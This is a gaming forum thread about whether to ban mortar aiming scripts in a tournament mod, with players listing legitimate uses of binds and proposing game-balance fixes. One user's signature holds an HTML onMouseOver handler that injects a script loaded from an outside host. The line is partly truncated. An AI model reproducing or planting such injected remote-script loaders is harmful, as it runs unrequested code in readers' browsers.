Banning mortar scripts

Discussion for Bani's Tournament Mod

Moderators: Forum moderators, developers

aurellie

Post by aurellie »

You can believe me on word. I am in scripting since early rtcw an at least making this thing accurate should not be a problem.

As soon as i finish it, i will release it to public, just becouse there are some guys bitching with that script.

If you ask me for opinion, i think mortar script is a good thing. Todays offence, as well as defence, tactics are 2 boring. Mortar would bring some good mobility and dinamics to both teams.

(don't bother with my elite english ;))
Sphere

Post by Sphere »

Ok aurellie, well fair play to you for saying you want to keep it because it helps. I totally disagree, but it's a fair opinion. :)

Thanks for the post rain - could you give me an idea of the legitimate uses that this would prevent ? I'm not looking for a comprehensive list, but so far the only example I've seen is people who don't use a mouse and use the keyboard for turning :?
ReyalP

Post by ReyalP »

Sphere wrote: Thanks for the post rain - could you give me an idea of the legitimate uses that this would prevent ? I'm not looking for a comprehensive list, but so far the only example I've seen is people who don't use a mouse and use the keyboard for turning :?
Off the top of my head:
- manual single axis or fine aim on mortar
- keyboard/joystick/other odd input devices
- use the keyoard manuver while you while you lift your beer (or do whatever :o) with the other hand.
- fast 180 degree turn binds
- strafe jump scripts
- bugprone O_o
- recoil compensation scripts O_o
send lawyers, guns and money
Rain

Post by Rain »

SCDS_reyalP wrote:Off the top of my head:
- use the keyoard manuver while you while you lift your beer (or do whatever :o) with the other hand.
Bingo.
SCDS_reyalP wrote: - fast 180 degree turn binds
Experimented with this a while back but didn't really find it terribly useful... The only time I used it was while pacing about on the railing on top of the objective building in cain (while waiting for axis.) :moo:
SCDS_reyalP wrote: - recoil compensation scripts O_o
Wouldn't mind seeing this die, though. :roll:
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Sphere

Post by Sphere »

SCDS_reyalP wrote: Off the top of my head:
- keyboard/joystick/other odd input devices
- fast 180 degree turn binds
- strafe jump scripts
- bugprone O_o
- recoil compensation scripts O_o
Ahh, OK. This is good info.

The ones that spring out as the most likely uses (and correct me if I'm wrong) are the fast 180 degree turns and the strafe scripts. I'm sure the recoil compensation is illegal anyway (at least in Europe) and is bugprone the same bugprone as the one that was found to be a hoax ?

Fair enough. Assuming that these are integral parts of the game, can you guys think of another simple way of resolving it ?
fretn

Post by fretn »

SCDS_reyalP wrote:
Sphere wrote: - fast 180 degree turn binds
I made one myself yesterday and tested it in a 1vs1, if you get used to it it can be usefull, but I ended up in turning 360° most of the time just because I thought my enemy was in my back :D

it's more funny than usefull I think

making 180° while trickjumping is fun ;)
Day by day : http://w.twwwo.be/
Mystiqq

Post by Mystiqq »

I made my self keyboard controlled mortar script long time ago, its very useful and im convinsed this should have been integrate with ET as default.
Other "workaround" possibly would be to slow down mouse speed when mortaring to have more accuracy, not sure thou, just thinking out loud. :)

Not sure about the predefined mortar scripts, they sound like they dont require much or no skill at all to use, other than scripting knowledge of course.
Heimdal

Post by Heimdal »

I completely agree with Sphere on this. Mortar scripts are in fact like aimbots. Hitting the exact same spot every time as a human is hard to impossible (you'll always hit a bit to the right or left or whatever). You have to be very good to not do that at all and giving all mortars a mortar script makes the mortar easier to use than a rifle nade.

It is an insult against all good mortars to let people use mortar scripts.
Ragnarok|GER

Post by Ragnarok|GER »

aurellie wrote:You can believe me on word. I am in scripting since early rtcw an at least making this thing accurate should not be a problem.
i wonder how you will work around the fps and wait-problem. probably your script will only work on pretty good systems.
if not, you're a genius. ;)
As soon as i finish it, i will release it to public, just becouse there are some guys bitching with that script.
that'll be fun on publics. you'll always know where the mortar guy is located when you're sure he's using your script.
(don't bother with my elite english ;))
np, the problem is to answer at the same level. ;)
uber-noob

Post by uber-noob »

Ragnarok|GER wrote: i wonder how you will work around the fps and wait-problem. probably your script will only work on pretty good systems.
I have no Problem to maintain a steady 43 FPS on my Athlon 1800 XP with a GF4-4200 and 768MB PC133 SD-Ram, even with all settings on high. And I wouldn't call this a pretty good system.
Ragnarok|GER

Post by Ragnarok|GER »

uber_noob wrote:
Ragnarok|GER wrote: i wonder how you will work around the fps and wait-problem. probably your script will only work on pretty good systems.
I have no Problem to maintain a steady 43 FPS on my Athlon 1800 XP with a GF4-4200 and 768MB PC133 SD-Ram, even with all settings on high. And I wouldn't call this a pretty good system.
did u looked at your fps-lagometer? (/cg_lagometer 2) is it a straight line?
uber-noob

Post by uber-noob »

Ragnarok|GER wrote:did u looked at your fps-lagometer? (/cg_lagometer 2) is it a straight line?
Yes, unless I start playing on a 40+ slots server.
AKP

Solution?

Post by AKP »

The mortar can fire two rounds rapidly after each other at two different locations with the script.

Could the solution be that the mortar only can fire once in eg. 10 sec. or more (chargebar has to fill up more), like the panzer!

Then the script wont be much more effective than a good manual mortar with time to aim.
Heimdal

Post by Heimdal »

Nice solution AKP, it would be like saying the mp40 cant hit headshots more than once every 10 seconds to make aimbots not work. Nerf it to remove scripts o.O
AKP

Post by AKP »

Nobody has come with a solution to stop the script, only alternative right now seems to ban the Mortar.

I was trying to make a sugestion which would stop the script from hitting to spots in few seconds.

Counterargument please why Mortar should be able to fire two rounds after each other